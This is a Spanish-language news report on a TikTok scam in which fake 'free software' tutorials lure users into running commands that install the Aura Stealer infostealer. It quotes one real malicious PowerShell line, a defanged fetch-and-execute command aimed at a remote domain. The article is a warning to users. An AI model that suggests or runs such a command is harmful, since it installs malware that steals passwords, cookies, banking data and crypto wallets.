Una nueva modalidad de robo de datos fue detectada en TikTok, donde circulan videos que enseñan supuestos métodos para descargar versiones gratuitas de programas como Windows, Netflix o Photoshop.
Detrás de estos falsos tutoriales se oculta un fraude informático diseñado para robar información personal y financiera de los usuarios, según reveló el experto en ciberseguridad Xavier Mertens, del SANS Internet Storm Center (ISC).
Los videos, que utilizan un tono casual y aparentan ser guías inofensivas, instruyen a los usuarios para ejecutar comandos en sus computadores.
LEA TAMBIÉN
Photoshop es una de las aplicaciones que prometen gratis para instalar el malware Foto:iStock
Sin embargo, en lugar de activar funciones “premium”, los comandos instalan software malicioso. Este método, identificado como ClickFix, había sido reportado previamente por el portal de ciberseguridad ‘Trend Micro’ y ahora se ha expandido en TikTok debido a la alta presencia de usuarios jóvenes interesados en trucos tecnológicos y descargas gratuitas.
Mertens advirtió que TikTok se ha convertido en un canal atractivo para los ciberdelincuentes, ya que su dinámica de confianza entre creadores y usuarios facilita la rápida difusión de videos engañosos. “Es una forma muy eficaz de ingeniería social. La gente confía en los creadores y no sospecha que un simple comando pueda comprometer su seguridad”, señaló el analista.
Uno de los ejemplos detectados muestra un video que promete activar Photoshop sin costo, instruyendo a los usuarios a ejecutar el siguiente comando en PowerShell:
- iex (irm slmgr[.]win/photoshop).
LEA TAMBIÉN
El robo de datos también se hace prometiendo Netflix gratis Foto:iStock
Aunque parece una instrucción técnica inofensiva, en realidad conecta el computador con un servidor remoto que descarga archivos maliciosos. De acuerdo con el portal ‘Bleeping Computer’, esos archivos incluyen una variante del malware Aura Stealer, capaz de extraer contraseñas guardadas en navegadores, cookies de autenticación, datos bancarios y billeteras de criptomonedas.
Los expertos recomiendan que las personas que hayan seguido instrucciones de estos videos cambien de inmediato todas sus contraseñas como las de correo electrónico, redes sociales y cuentas bancarias. Además, que realicen un escaneo completo con un antivirus actualizado y eviten ejecutar comandos o descargas que no provengan de fuentes oficiales.